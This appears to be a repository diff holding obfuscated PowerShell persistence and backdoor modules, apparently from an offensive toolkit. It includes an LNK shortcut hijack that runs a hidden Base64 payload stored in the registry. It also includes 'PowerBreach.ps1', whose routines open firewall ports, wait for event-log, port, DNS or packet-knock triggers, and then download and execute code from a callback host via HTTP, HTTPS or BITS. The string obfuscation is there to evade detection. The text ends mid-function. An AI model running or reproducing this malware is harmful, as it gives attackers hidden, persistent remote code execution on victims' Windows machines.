[Parameter(VaLuefROmpiPeLiNE=${t`RUE}, MAnDaTORY = ${T`RUE})]
[ValidateScript({&("{2}{0}{3}{1}"-f'es','h','T','t-Pat') -Path ${_} })]
[String]
${L`NkPAth},
[String]
${E`NC`SCRi`pT},
[String]
${Re`Gp`ATH} = (("{6}{2}{7}{3}{5}{9}{1}{0}{8}{4}"-f'wsOfWd','indo','OfWSoftwa','fW','bug','Micr','HKCU:','reO','e','osoftOfWW'))."rEPlA`Ce"(([ChaR]79+[ChaR]102+[ChaR]87),'\'),
[Switch]
${C`LeaN`Up}
)
${Regp`AR`Ts} = ${r`Egp`ATh}.("{1}{0}" -f 'plit','s').Invoke("\")
${P`Ath} = ${RegPa`R`Ts}[0..(${Re`G`pArts}."co`unT"-2)] -join "\"
${n`Ame} = ${RE`G`pA`RtS}[-1]
${o`BJ} = &("{2}{1}{0}"-f't','-Objec','New') -ComObject ("{1}{3}{0}{2}" -f 't','WS','.Shell','crip')
${L`NK} = ${O`Bj}.("{2}{4}{1}{0}{3}"-f 'ate','e','C','Shortcut','r').Invoke(${LNk`Pa`Th})
${Tar`gETPa`Th} = ${l`NK}."taRge`Tp`Ath"
${wO`R`Ki`NGDIREC`TOrY} = ${L`Nk}."w`oR`ki`NGdI`RECtO`RY"
${ic`oNlOc`AtION} = ${L`Nk}."iCO`Nlo`cAtI`on"
if(${cl`ea`NuP}) {
${ori`gI`NALP`A`Th} = (${iCOnLo`Ca`TI`ON} -split ",")[0]
${l`Nk}."Ta`Rge`TPAth" = ${orig`In`AlpA`TH}
${l`NK}."AR`G`Uments" = ${nU`ll}
${L`NK}."w`INDO`wSTyle" = 1
${l`Nk}.("{1}{0}"-f'e','Sav').Invoke()
${N`ULL} = &("{2}{1}{3}{4}{0}" -f'perty','v','Remo','e-Ite','mPro') -Force -Path ${P`ATH} -Name ${Na`mE}
}
else {
if(!${En`c`SCRiPT} -or ${eNcSC`R`iPt} -eq '') {
throw ("{1}{5}{3}{2}{7}{0}{6}{4}"-f'qu','-En','Clea','cript or -','!','cS','ired','nup re')
}
${Nu`Ll} = .("{2}{0}{1}"-f'emPro','perty','Set-It') -Force -Path ${pA`Th} -Name ${n`AmE} -Value ${Enc`SCRI`pt}
('[*'+'] '+'B64'+' '+'sc'+'ript '+'s'+'tored '+'at'+' '+"'$RegPath'`n")
${l`NK}."TA`RG`E`TPAtH" = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
${lAU`NC`HsT`RinG} = ((("{3}{6}{5}{4}{1}{0}{7}{2}{8}"-f 'ss','ce','t(','[Syste','.Pro','ics','m.Diagnost',']::Star','sTp')) -rEplACE([ChAR]115+[ChAR]84+[ChAR]112),[ChAR]34)+${t`A`RGEtpATH}+(("{15}{5}{14}{1}{2}{11}{6}{12}{0}{9}{8}{3}{13}{7}{10}{4}" -f 'GetString(','nc','oding','s','g((gp ','[Text.','O','tri','romBa','[Convert]::F','n',']::UNIC','DE.','e64S','E','ahz);IEX ('))."REPla`ce"('ahz',[STrIng][cHAR]34)+${p`ATH}+' '+${N`AmE}+').'+${n`Ame}+')))'
${la`unc`hBy`TeS} = ( VAriaBLE ("{1}{0}"-f'osWH','9') ).vALuE::"UnI`co`dE".("{2}{0}{1}" -f 'etByte','s','G').Invoke(${laUN`Ch`sTR`i`NG})
${LAUN`Ch`B64} = ( ITEm ("VAriaBL"+"E"+":2I"+"0") ).vALUE::("{0}{3}{2}{1}"-f 'To','String','e64','Bas').Invoke(${l`A`UNcH`BYteS})
${L`NK}."ar`gU`meNTs" = ('-w'+' '+'hid'+'de'+'n '+'-no'+'p '+'-enc'+' '+"$LaunchB64")
${l`Nk}."W`O`R`k`INGDIrecTORy" = ${W`oRki`NGD`IRECtoRy}
${L`NK}."IC`o`NLOcAti`on" = "$TargetPath,0"
${L`NK}."wiND`oW`sTyLe" = 7
${L`Nk}.("{0}{1}"-f'Sa','ve').Invoke()
('[*'+'] '+'.'+'LNK '+'a'+'t '+"$LNKPath "+'se'+'t '+'t'+'o '+"trigger`n")
}
}

583
data/obfuscated_module_source/persistence/PowerBreach.ps1 Normal file
View File

@ -0,0 +1,583 @@
&('sV') ("HD7"+"f") ([typE]("{3}{0}{7}{2}{4}{5}{6}{1}" -f 'M','er','serV','sysTE','i','Ce','PoIntmANag','.nEt.') ); &("{2}{1}{0}" -f 'TeM','-i','sEt') ('v'+'arIablE:'+'H8gJ') ([TYPe]("{3}{2}{1}{0}" -F'oNvErt','c','M.','sYSte') ); &("{1}{0}" -f 'et','S') ('2'+'6k') ([tYpE]("{2}{0}{3}{4}{1}" -f 'T','codiNg','sYsTem.TEx','.','EN')); &("{0}{2}{1}"-f'sET','M','-ITE') ("v"+"AriAb"+"L"+"e:eXk"+"w") ( [TYpE]("{4}{0}{3}{2}{1}"-F's','.NEt.dnS','Em','T','sy') ) ; &('SV') ("{0}{1}"-f'D','8JFH') ([TypE]("{1}{8}{3}{5}{2}{0}{6}{4}{7}" -F 'WS','S','IndO','CUR','It','Ity.prINCiPAl.w','IDEnt','Y','E') ) ; ${eI`JS} =[TyPE]("{1}{0}" -F'egeX','R');&("{1}{3}{0}{2}" -f 'b','sEt-VAr','le','iA') ("hE"+"8") ([tYpE]("{4}{1}{3}{5}{2}{6}{0}"-f'y','T.sOC','EsSfam','kets.','nE','AddR','iL')) ; &("{0}{1}"-f's','Et') ('r'+'H2Iz') ( [type]("{1}{5}{0}{2}{3}{4}"-f 'oCkeTS.sock','Ne','et','Ty','pe','T.S')) ; ${o0F}= [type]("{6}{3}{5}{2}{1}{4}{0}"-F 'YpE','L','o','OCkEts.pRot','T','oc','NET.s'); &("{0}{1}" -f 'se','t') ("7n"+"X"+"2BS") ( [Type]("{3}{0}{2}{5}{1}{4}"-F '.','oNTrOl','soCk','nEt','COde','ETS.ioc') ) ; &("{0}{1}" -f'S','ET') ("{1}{0}" -f'e3','X') ( [tyPe]("{2}{0}{1}{3}" -f'cKeTs.SOckEtfl','aG','neT.so','S') ); &('SV') ('C'+'Qm') ( [tYpE]("{0}{1}"-F'dATE','tIMe') );
function invOkE-CAllB`Ac`k`i`eX
{
Param(
[Parameter(mANDATory=${tr`Ue},POSitIOn=1)]
[string]${C`A`LlB`ACKIP},
[Parameter(mAnDAtoRy=${fa`L`se},poSItion=2)]
[int]${mE`TH`od}=0,
[Parameter(mANDATORy=${Fal`SE},PoSITIoN=3)]
[string]${bi`Ts`TeMpFiLe}="$env:temp\ps_conf.cfg",
[Parameter(MAnDAtORY=${F`A`lSe},POSITIOn=4)]
[string]${rE`souRCe}=("{0}{1}{2}"-f '/fa','vico','n.ico'),
[Parameter(mAnDaTory=${f`ALSE},PoSItioN=5)]
[bool]${S`ilEnt}=${f`AlsE}
)
if(${C`AL`LbA`ckiP})
{
try {
if (${mE`T`HoD} -eq 0)
{
${u`RL}="http://$CallbackIP$resource"
if(-not ${si`l`eNt}) {&("{1}{2}{0}" -f'st','writ','e-ho') ('Ca'+'llin'+'g '+'ho'+'me '+'with'+' '+'m'+'ethod'+' '+"$method "+'t'+'o: '+"$url")}
${E`Nc} = (&("{3}{1}{2}{0}" -f'ct','w-ob','je','ne') ("{0}{1}{2}"-f 'n','et.webc','lient')).("{2}{0}{4}{3}{1}"-f 'oadst','ng','downl','i','r').Invoke(${u`Rl})
}
elseif (${m`E`ThOD} -eq 1)
{
${h`d7f}::"SER`VERcE`R`TiFic`A`T`e`VALIDAtioncALL`BacK" = {${tr`uE}}
${u`RL}="https://$CallbackIP$resource"
if(-not ${SI`L`EnT}) {&("{1}{0}{2}" -f's','write-ho','t') ('Ca'+'lling'+' '+'ho'+'me '+'wit'+'h '+'me'+'t'+'hod '+"$method "+'to:'+' '+"$url")}
${E`Nc} = (&("{1}{0}{2}" -f'-','new','object') ("{3}{2}{1}{0}" -f'bclient','we','t.','ne')).("{1}{0}{2}{3}" -f'wnlo','do','adstrin','g').Invoke(${u`Rl})
}
elseif (${MeT`hod} -eq 2)
{
${U`Rl}="http://$CallbackIP$resource"
if(-not ${sILe`Nt}) { &("{2}{0}{1}"-f 'te','-host','wri') ('C'+'alling'+' '+'home'+' '+'w'+'ith '+'metho'+'d '+"$method "+'t'+'o: '+"$url")
&("{0}{1}{2}" -f'write-','ho','st') ('BITS'+' '+'Temp'+' '+'o'+'u'+'tput '+'to'+': '+"$BitsTempFile")}
&("{0}{2}{1}" -f'I','Module','mport-') ("{1}{0}"-f'ts*','*bi')
&("{4}{1}{2}{3}{0}" -f 'r','t-Bi','tsTra','nsfe','Star') ${u`Rl} ${Bi`TStEM`PfiLe} -ErrorAction ("{1}{0}"-f 'top','S')
${E`Nc} = &("{1}{3}{0}{2}"-f'nt','Get-','ent','Co') ${bI`T`St`EMPfi`lE} -ErrorAction ("{1}{0}" -f 'op','St')
&("{0}{3}{2}{1}" -f'Re','-Item','ove','m') ${BITs`TEm`p`FIlE} -ErrorAction ("{1}{0}{2}{3}" -f'yC','Silentl','ontinu','e')
}
else
{
if(-not ${s`IlE`NT}) { &("{2}{0}{3}{1}"-f'ri','st','w','te-ho') ("{6}{7}{1}{2}{3}{5}{0}{4}" -f' meth','ro','per call','b','od','ack','Err','or: Imp') -fore ("{1}{0}"-f'd','re')}
return 0
}
if (${e`NC})
{
${B} = ( &("{1}{0}" -f 'tem','I') ('V'+'ARiABlE:'+'H8GJ') )."v`AlUe"::("{2}{3}{0}{4}{1}"-f 'Base6','ring','F','rom','4St').Invoke(${e`Nc})
${D`ec} = ( &("{1}{2}{0}{3}" -f 'L','gEt-c','hI','ditem') ("vaRi"+"able:"+"26"+"K"))."V`ALUE"::"U`TF8".("{0}{1}{2}"-f 'G','etStrin','g').Invoke(${b})
&("{1}{0}" -f'x','ie') ${d`EC}
}
else
{
if(-not ${S`Il`enT}) { &("{2}{1}{0}" -f'host','rite-','w') ("{5}{4}{2}{0}{1}{3}" -f'a Dow','n','o Dat','loaded',' N','Error:') -fore ("{1}{0}"-f'd','re')}
return 0
}
}
catch [System.Net.WebException]{
if(-not ${s`i`lEnT}) { &("{2}{1}{0}"-f 't','e-hos','writ') ("{4}{5}{2}{0}{1}{3}" -f 'llback fai','l','a','ed','Error: Ne','twork C') -fore ("{1}{0}"-f 'd','re')}
return 0
}
catch [System.FormatException]{
if(-not ${si`lE`Nt}) { &("{2}{1}{0}" -f't','os','write-h') ("{3}{4}{7}{5}{1}{2}{0}{8}{6}" -f'ma','4 F','or','Err','or','Base6','blem',': ','t Pro') -fore ("{1}{0}" -f 'ed','r')}
return 0
}
catch [System.Exception]{
if(-not ${SI`LE`Nt}) { &("{1}{0}{2}" -f 'ho','write-','st') ("{7}{5}{3}{2}{6}{4}{0}{1}"-f 'transfe','r','wn probl','Ukno',' ','r: ','em during','Erro') -fore ("{0}{1}"-f 're','d')}
return 0
}
}
else
{
if(-not ${s`IlE`Nt}) { &("{0}{1}{2}" -f'w','rite-ho','st') ("{7}{6}{5}{4}{2}{3}{1}{0}" -f ':(',' home ',' for the',' phone','specified',' ','t','No hos') -fore ("{0}{1}" -f 're','d')}
return 0
}
return 1
}
function add-PSfIReW`All`R`u`les
{
Param(
[Parameter(MAnDatoRy=${FAl`SE},PosItIOn=1)]
[string]${R`u`leN`AMe}=("{5}{2}{0}{4}{3}{1}"-f'ws ','rshell','indo','owe','P','W'),
[Parameter(maNdaTORY=${FA`l`Se},positIon=2)]
[string]${e`xEp`Ath}=((("{3}{0}{13}{6}{11}{12}{2}{1}{7}{8}{10}{14}{4}{9}{5}{15}" -f '{0}','n','2{0}wi','C:','0','shel','}sy','dowspo','wershe','}power','ll{0}v','ste','m3','windows{0','1.0{','l.exe'))-F [cHar]92),
[Parameter(MaNDaTOry=${F`AL`SE},PosItioN=3)]
[string]${PO`RTs}=("{0}{1}" -f'1-6500','0')
)
If (-NOT ([Security.Principal.WindowsPrincipal] ${d8`Jfh}::("{1}{3}{2}{0}" -f 't','G','en','etCurr').Invoke())."Isin`ROlE"([Security.Principal.WindowsBuiltInRole] ("{0}{2}{1}{4}{3}" -f 'Admi','tr','nis','or','at')))
{
&("{2}{1}{0}" -f 'ost','rite-H','W') ("{3}{9}{2}{0}{8}{7}{1}{6}{5}{4}" -f 'e',' :(... g',' r','Th',' ',' work!','et to','in','quires Adm','is command')
Return
}
${fW} = &("{0}{2}{1}{3}"-f 'Ne','ec','w-Obj','t') -ComObject ("{1}{0}{2}{3}" -f 'w','hnetcfg.f','po','licy2')
${rU`le} = &("{1}{0}{2}{3}"-f'e','N','w','-Object') -ComObject ("{2}{0}{1}{3}{4}"-f'NetCfg','.','H','FWRu','le')
${r`uLE}."NA`ME" = ${R`ulE`Name}
${r`ule}."ApPl`I`cA`TIOnn`AMe"=${Ex`EP`ATh}
${r`ULE}."Pr`Oto`cOL" = 6
${RU`lE}."loCA`lpOR`Ts" = ${Po`RTs}
${ru`lE}."dIr`ec`TioN" = 2
${ru`Le}."E`N`ABlEd"=${T`RUe}
${RU`LE}."g`RO`UpinG"=("{2}{1}{0}{4}{5}{3}"-f'api.d','rewall','@fi','5','ll,-','2325')
${r`ULE}."P`ROF`ilEs" = 7
${rU`Le}."act`i`On"=1
${R`uLE}."EDg`eTr`Ave`RSAl"=${f`A`Lse}
${F`W}."RU`LeS".("{0}{1}" -f 'A','dd').Invoke(${rU`Le})
${ru`LE} = &("{1}{2}{0}"-f'ject','New-O','b') -ComObject ("{4}{0}{3}{2}{1}"-f 'etCf','Rule','.FW','g','HN')
${r`ulE}."N`AMe" = ${rU`LEna`Me}
${ru`Le}."a`P`PlIca`TIoNNa`me"=${e`x`epAtH}
${ru`Le}."p`RO`TocoL" = 17
${RU`Le}."lO`cal`POrtS" = ${P`or`Ts}
${rU`le}."di`RecT`Ion" = 2
${r`ule}."ena`B`leD"=${t`RUe}
${rU`lE}."g`Ro`upiNG"=("{2}{3}{5}{4}{1}{6}{0}" -f '55','.','@fir','e','allapi','w','dll,-232')
${R`uLe}."pRoFi`lES" = 7
${r`ule}."Act`Ion"=1
${ru`lE}."Ed`GE`TrAvErsAl"=${FAL`se}
${fw}."r`ulES".("{0}{1}" -f'Ad','d').Invoke(${R`ulE})
${r`UlE} = &("{2}{0}{1}"-f'b','ject','New-O') -ComObject ("{3}{0}{1}{2}"-f'tCfg.F','WRul','e','HNe')
${ru`Le}."n`Ame" = ${RU`L`E`NaME}
${Ru`Le}."Ap`plicAtio`Nn`AME"=${exEP`A`Th}
${rU`Le}."pr`Otoc`Ol" = 6
${rU`Le}."LOcA`lP`oR`Ts" = ${p`o`Rts}
${R`UlE}."d`IrecTI`on" = 1
${rU`le}."EN`A`BLeD"=${T`RUe}
${R`ule}."gROUp`i`Ng"=("{0}{3}{2}{5}{1}{4}" -f '@fire','dll,-','allapi','w','23255','.')
${Ru`lE}."P`ROfIl`es" = 7
${ru`lE}."AC`TION"=1
${R`ULE}."EdgEt`RAv`ER`saL"=${fal`SE}
${fw}."RuL`ES".("{0}{1}"-f 'Ad','d').Invoke(${rU`LE})
${rU`Le} = &("{0}{1}{2}"-f 'N','ew-O','bject') -ComObject ("{2}{1}{0}"-f 'e','ul','HNetCfg.FWR')
${R`ule}."NA`mE" = ${r`UlEN`AmE}
${ru`lE}."ApP`lICAt`Ionna`mE"=${eXEp`Ath}
${R`uLE}."PRotO`col" = 17
${R`uLe}."lo`caLp`OrTS" = ${PO`Rts}
${rU`LE}."DI`REc`TIon" = 1
${ru`lE}."ENA`BLed"=${tR`uE}
${rU`LE}."Gr`oUpI`Ng"=("{2}{1}{3}{0}{4}{5}{6}"-f'i.','wal','@fire','lap','dll,-','2325','5')
${ru`lE}."profIl`es" = 7
${r`UlE}."AC`Ti`oN"=1
${RU`le}."E`dGetR`AVErSaL"=${f`AlSE}
${F`W}."RUL`Es".("{0}{1}" -f'A','dd').Invoke(${Ru`le})
}
function I`N`VoKe-`eVeN`TlooP
{
Param(
[Parameter(MaNDatory=${TR`Ue},PoSiTIon=1)]
[string]${CALlb`A`cK`iP},
[Parameter(MANDAtoRy=${Fa`L`se},pOSITIoN=2)]
[string]${T`RiGg`er}=("{1}{0}"-f 'UB','SIXD'),
[Parameter(mAnDatory=${f`A`LsE},pOsITIoN=3)]
[int]${t`I`mEOUT}=0,
[Parameter(mAnDatOry=${f`Al`SE},pOSItIoN=4)]
[int] ${sLe`ep}=1
)
If (-NOT ([Security.Principal.WindowsPrincipal] ${d`8Jfh}::("{1}{2}{0}" -f'rrent','Get','Cu').Invoke())."i`Sin`RoLE"([Security.Principal.WindowsBuiltInRole] ("{3}{0}{4}{2}{1}" -f'dmi','tor','tra','A','nis')))
{
&("{0}{2}{1}"-f'Wr','e-Host','it') ("{13}{4}{3}{7}{9}{11}{2}{6}{8}{1}{5}{10}{12}{0}" -f ' ','et ','s Admin :','r','is backdoor ','t','(... ','eq','g','ui','o','re',' work!','Th')
Return
}
&("{1}{2}{0}{3}" -f'-h','writ','e','ost') ('Timeou'+'t'+': '+"$Timeout")
&("{1}{0}{2}" -f'rite-','w','host') ('T'+'ri'+'gger: '+"$Trigger")
&("{0}{1}{2}"-f'wr','ite-ho','st') ('C'+'a'+'llbac'+'kIP: '+"$CallbackIP")
&("{2}{1}{0}"-f 'ost','e-h','writ')
&("{3}{1}{2}{0}" -f't','te','-hos','wri') ("{4}{0}{1}{2}{3}" -f'a','rting bac','kdo','or...','St')
${R`U`NNinG}=${tR`ue}
${MaT`ch} =""
${s`T`ArttImE} = &("{1}{0}{2}"-f't-da','ge','te')
while(${Ru`NNI`Ng})
{
if (${tI`Me`Out} -ne 0 -and ($( ( &('lS') ('va'+'R'+'IaB'+'lE:CqM') )."V`ALue"::"N`Ow") -gt ${s`T`AR`TtiMe}.("{1}{2}{0}" -f 'seconds','ad','d').Invoke(${tI`MeOuT})))
{
${R`unnI`NG}=${f`Al`Se}
}
${d} = &("{2}{0}{1}" -f'at','e','Get-D')
${nE`Weve`NTS} = &("{0}{1}{2}" -f 'G','et-W','inEvent') -FilterHashtable @{("{1}{2}{0}" -f'me','log','na')=("{2}{1}{0}" -f'ity','ur','Sec'); ("{1}{0}{2}" -f 'ar','St','tTime')=${d}.("{0}{1}{3}{2}" -f 'Add','Sec','s','ond').Invoke(-${sl`EEp})} -ErrorAction ("{0}{3}{4}{2}{1}"-f 'Si','inue','lyCont','len','t') | &('fl') ("{1}{2}{0}"-f 'sage','M','es') | &("{3}{0}{2}{1}"-f'S','ing','tr','Out-')
if (${nEW`EV`enTs} -match ${triGG`ER})
{
${rU`NN`ing}=${fAL`Se}
${mA`T`ch} = ${CAl`lBA`CkIp}
&("{0}{2}{1}" -f 'wr','-host','ite') ('M'+'a'+'tch: '+"$match")
}
&("{0}{1}" -f'sl','eep') -s ${SL`eEP}
}
if(${M`ATCh})
{
${S`u`CCess} = &("{3}{2}{4}{1}{0}"-f 'IEX','llback','vok','In','e-Ca') ${mAT`Ch}
}
}
function InV`o`k`E-PorTbiND
{
Param(
[Parameter(MAnDatorY=${F`A`lse},PosItIon=1)]
[string]${c`AllbACk`ip},
[Parameter(MANdAToRy=${f`A`lsE},pOSiTion=2)]
[string]${l`OCaL`Ip},
[Parameter(MaNDaTOrY=${fAl`se},PosItIOn=3)]
[int]${po`Rt}=4444,
[Parameter(mANDatory=${F`ALsE},posItIoN=4)]
[string]${T`RiGGER}=("{0}{1}{2}" -f'Q','AZWS','X123'),
[Parameter(maNDAtoRY=${fA`LSE},poSITion=5)]
[int]${T`IMEO`UT}=0
)
if (-not ${l`oCAlIp})
{
&("{1}{0}" -f 'te','rou') ("{1}{0}" -f 'int','pr') ('0*') | &('%') {
if (${_} -match "\s{2,}0\.0\.0\.0") {
${nu`LL},${NU`lL},${nu`Ll},${lo`c`ALIP},${nu`lL} = ( &("{1}{2}{0}{3}" -f'i','G','et-vAr','Able') ('E'+'iJs') )."v`ALUE"::("{0}{1}{2}"-f 'rep','lac','e').Invoke(${_}.("{2}{1}{0}" -f't','r','trimsta').Invoke(" "),"\s{2,}",",").("{0}{1}"-f's','plit').Invoke(",")
}
}
}
&("{0}{1}{2}{3}"-f 'w','ri','te-','host') ("{7}{0}{1}{5}{10}{6}{12}{13}{11}{3}{4}{9}{8}{2}"-f'H','IS BACKD',' !!!','AL','L EX','OOR','RES','!!! T','ION','CEPT',' REQUI','IREW',' ','F')
&("{2}{1}{0}"-f 't','te-hos','wri') ('Timeou'+'t'+':'+' '+"$Timeout")
&("{0}{2}{1}" -f 'wr','ost','ite-h') ('P'+'ort:'+' '+"$Port")
&("{2}{0}{1}"-f'ite-h','ost','wr') ('Trig'+'ger:'+' '+"$Trigger")
&("{1}{2}{3}{0}" -f 't','write','-h','os') ('Us'+'ing '+'I'+'Pv4 '+'A'+'d'+'dr'+'ess: '+"$LocalIP")
&("{1}{0}{2}"-f'e-ho','writ','st') ('C'+'al'+'lbackIP'+': '+"$CallbackIP")
&("{0}{1}{2}{3}"-f'wri','te','-hos','t')
&("{0}{1}{2}"-f'wri','t','e-host') ("{4}{5}{3}{0}{2}{1}" -f'ing ba','.','ckdoor..','t','Sta','r')
try{
${iPe`ND`Po`int} = &("{1}{0}{2}" -f 'w-obj','ne','ect') ("{1}{5}{2}{0}{3}{4}{6}"-f 'net.i','sys','m.','pend','p','te','oint')([net.ipaddress]"$localIP",${pO`RT})
${LisTEN`Er} = &("{0}{1}{3}{2}"-f'new-o','b','t','jec') ("{4}{3}{1}{2}{0}{5}" -f 'ts.','Soc','ke','tem.Net.','Sys','TcpListener') ${IpE`N`DpoInt}
${lisT`En`Er}.("{0}{1}" -f'S','tart').Invoke()
${R`unnI`Ng}=${TR`uE}
${M`ATCh} =""
${S`TarT`TIme} = &("{2}{1}{0}"-f '-date','et','g')
while(${r`unni`NG})
{
if (${t`Imeo`uT} -ne 0 -and ($( ${c`qM}::"N`Ow") -gt ${S`Ta`RTtIme}.("{1}{0}{2}" -f 'se','add','conds').Invoke(${TiM`EO`ut})))
{
${RUNN`i`Ng}=${FAL`sE}
}
if(${liSte`Ner}.("{1}{0}"-f'ing','Pend').Invoke())
{
${cL`iENt} = ${liST`E`NEr}.("{1}{0}{4}{2}{3}" -f 'cce','A','cpCli','ent','ptT').Invoke()
&("{0}{2}{1}"-f 'wri','e-host','t') ("{0}{2}{1}{3}"-f 'Cl','Connec','ient ','ted!')
${STRE`AM} = ${C`L`Ient}.("{1}{0}{2}"-f'rea','GetSt','m').Invoke()
${RE`AD`er} = &("{2}{0}{3}{1}" -f'j','t','new-ob','ec') ("{2}{1}{3}{0}"-f'eader','tem.IO','Sys','.StreamR') ${sTre`Am}
${l`ine} = ${re`AdEr}.("{0}{1}"-f 'ReadLin','e').Invoke()
if (${li`NE} -eq ${TRi`Gg`Er})
{
${r`un`NInG}=${Fal`Se}
${MaT`Ch} = ([system.net.ipendpoint] ${C`LiE`NT}."CLi`e`Nt"."Rem`OTE`End`p`OiNt")."ADDr`ess".("{0}{1}"-f'T','oString').Invoke()
&("{0}{1}{2}"-f 'wri','te-h','ost') ('MATCH'+':'+' '+"$match")
}
${r`eADER}.("{0}{1}"-f 'Di','spose').Invoke()
${s`T`REAM}.("{1}{0}" -f'e','Dispos').Invoke()
${CLiE`Nt}.("{1}{0}" -f 'se','Clo').Invoke()
&("{1}{2}{0}{3}" -f'-hos','writ','e','t') ("{2}{1}{3}{0}"-f'cted',' Disco','Client','nne')
}
}
&("{0}{1}{2}" -f 'w','rite-ho','st') ("{2}{0}{1}" -f 'ng ','Socket','Stoppi')
${l`is`TEneR}.("{0}{1}"-f 'St','op').Invoke()
if(${mA`Tch})
{
if(${c`AllB`A`ckiP})
{
${sUCcE`Ss} = &("{1}{4}{2}{0}{3}" -f 'IE','Invoke-Call','ack','X','b') ${cAlL`BACk`Ip}
}
else
{
${s`UcceSs} = &("{2}{0}{1}{4}{3}"-f'ke','-Callb','Invo','ckIEX','a') ${M`AtcH}
}
}
}
catch [System.Net.Sockets.SocketException] {
&("{3}{0}{2}{1}" -f'rite','t','-hos','w') ("{2}{0}{5}{1}{4}{3}"-f'r:','cke','Erro','r','t Erro',' So') -fore ("{1}{0}"-f'd','re')
}
}
function I`Nvok`e-`Dn`SlOOP
{
param(
[Parameter(MAndaTory=${F`AlSe},PosITIOn=1)]
[string]${CA`l`lB`AcKIP},
[Parameter(mandaTory=${f`AlsE},PoSITION=2)]
[string]${hoS`TN`AmE}=("{0}{3}{2}{1}{4}"-f 'yay.','dub.n','x','si','et'),
[Parameter(MandAtoRy=${Fal`sE},POsItIoN=3)]
[string]${Tri`GG`er}=("{0}{1}{2}"-f '127','.0','.0.1'),
[Parameter(MaNdaToRY=${F`AlSe},POSitIOn=4)]
[int] ${TI`MEOUT}=0,
[Parameter(maNDatOry=${Fal`SE},poSITioN=5)]
[int] ${sLE`Ep}=1
)
&("{1}{0}{2}"-f'os','write-h','t') ('Timeou'+'t'+': '+"$Timeout")
&("{0}{1}{2}" -f 'write-','ho','st') ('S'+'leep '+'T'+'ime: '+"$Sleep")
&("{1}{0}{2}"-f 't','wri','e-host') ('T'+'r'+'igger: '+"$Trigger")
&("{0}{2}{1}" -f'w','ite-host','r') ('Usi'+'ng'+' '+'Hostn'+'am'+'e:'+' '+"$Hostname")
&("{1}{0}{2}" -f 'rite-ho','w','st') ('Cal'+'lbackIP'+': '+"$CallbackIP")
&("{1}{2}{0}"-f'st','writ','e-ho')
&("{2}{1}{0}" -f 'e-host','it','wr') ("{2}{3}{1}{4}{0}"-f'...',' back','St','arting','door')
${rUN`N`ing}=${t`RUe}
${MAt`ch} =""
${STA`R`Tti`me} = &("{1}{0}" -f 'e','get-dat')
while(${R`U`NNINg})
{
if (${tImE`OuT} -ne 0 -and ($( ${C`qm}::"n`ow") -gt ${S`TarT`Ti`ME}.("{1}{2}{3}{0}" -f'nds','a','dd','seco').Invoke(${Ti`meO`Ut})))
{
${rU`N`NiNG}=${fA`L`Se}
}
try {
${I`Ps} = ( &("{0}{1}"-f'VAR','IaBLe') ('E'+'XkW') )."Val`Ue"::("{2}{1}{4}{3}{0}"-f 'ddresses','tH','Ge','A','ost').Invoke(${h`OsTnamE})
foreach (${Ad`DR} in ${i`ps})
{
${R`esOL`Ved}=${ad`Dr}."ipAddrE`Ss`TO`sTR`INg"
if(${r`eSo`LV`eD} -ne ${tr`Ig`ger})
{
${Runn`iNg}=${Fa`l`SE}
${m`At`CH}=${RES`O`Lved}
&("{1}{2}{0}"-f 't','wr','ite-hos') ('Mat'+'ch: '+"$match")
}
}
}
catch [System.Net.Sockets.SocketException]{
}
&("{1}{0}"-f 'eep','sl') -s ${slE`Ep}
}
&("{0}{1}{2}{3}"-f 'writ','e-ho','s','t') ("{0}{6}{3}{4}{2}{1}{5}" -f'Shutting do','Check..','S ','D','N','.','wn ')
if(${MaT`cH})
{
if(${CAL`LbaC`k`ip})
{
${S`UCC`eSs} = &("{2}{0}{3}{1}{5}{4}"-f 'k','-C','Invo','e','IEX','allback') ${c`AL`lbACKIp}
}
else
{
${s`uC`CesS} = &("{0}{4}{5}{1}{2}{3}"-f'I','l','backI','EX','nvo','ke-Cal') ${mA`T`ch}
}
}
}
function INvoke-`p`ACKe`TKNock
{
param(
[Parameter(mandaTORy=${f`AL`SE},POSItiON=1)]
[string]${C`ALLBa`ckIp},
[Parameter(mANdatOry=${FAL`Se},pOsiTiOn=2)]
[string]${LOc`ALIP},
[Parameter(MaNdatory=${Fa`lSE},POsITiON=3)]
[string]${T`RiGgER}=("{0}{2}{1}"-f'Q','X123','AZWS'),
[Parameter(maNDAtory=${F`A`LSe},POsITION=4)]
[int]${T`imeOuT}=0
)
If (-NOT ([Security.Principal.WindowsPrincipal] ( &("{2}{1}{0}" -f'aBle','ARI','V') ("{1}{0}" -f'Jfh','d8'))."Va`LUE"::("{1}{0}{2}"-f 'e','GetCurr','nt').Invoke())."IsI`NRoLe"([Security.Principal.WindowsBuiltInRole] ("{2}{3}{0}{1}"-f'trato','r','Admin','is')))
{
&("{1}{0}{2}" -f 'os','Write-H','t') ("{7}{3}{0}{2}{10}{1}{4}{9}{6}{11}{12}{8}{5}" -f'kdo','ui','or r',' bac','res Admi','! ','... ge','This','k','n :(','eq','t to ','wor')
Return
}
if (-not ${LOc`Al`IP})
{
&("{1}{0}" -f'oute','r') ("{1}{0}" -f 't','prin') ('0*') | &('%') {
if (${_} -match "\s{2,}0\.0\.0\.0") {
${N`uLl},${nu`LL},${n`UlL},${l`Ocal`iP},${n`ULL} = ${eI`jS}::("{0}{1}{2}"-f'repla','c','e').Invoke(${_}.("{0}{1}" -f't','rimstart').Invoke(" "),"\s{2,}",",").("{1}{0}"-f 'it','spl').Invoke(",")
}
}
}
&("{2}{0}{1}"-f'e-hos','t','writ') ("{5}{4}{2}{1}{9}{10}{7}{8}{6}{3}{11}{0}" -f'ON !!!',' ','ACKDOOR','L EXC','S B','!!! THI','IREWAL','S ','F','REQUI','RE','EPTI')
&("{2}{1}{0}" -f'host','te-','wri') ('Time'+'ou'+'t: '+"$Timeout")
&("{2}{3}{0}{1}" -f 'os','t','writ','e-h') ('Trig'+'ger'+': '+"$Trigger")
&("{1}{0}{2}" -f 'te-','wri','host') ('U'+'s'+'ing '+'IPv'+'4 '+'Ad'+'dre'+'ss: '+"$LocalIP")
&("{2}{0}{1}"-f'te-ho','st','wri') ('Ca'+'l'+'l'+'backIP: '+"$CallbackIP")
&("{0}{1}{3}{2}" -f 'write-','h','st','o')
&("{1}{3}{0}{2}"-f'h','w','ost','rite-') ("{1}{0}{2}{3}"-f'rting','Sta',' backdoor.','..')
${bYT`EIN} = &("{1}{0}{2}" -f 'obj','new-','ect') ("{0}{1}" -f'byte[',']') 4
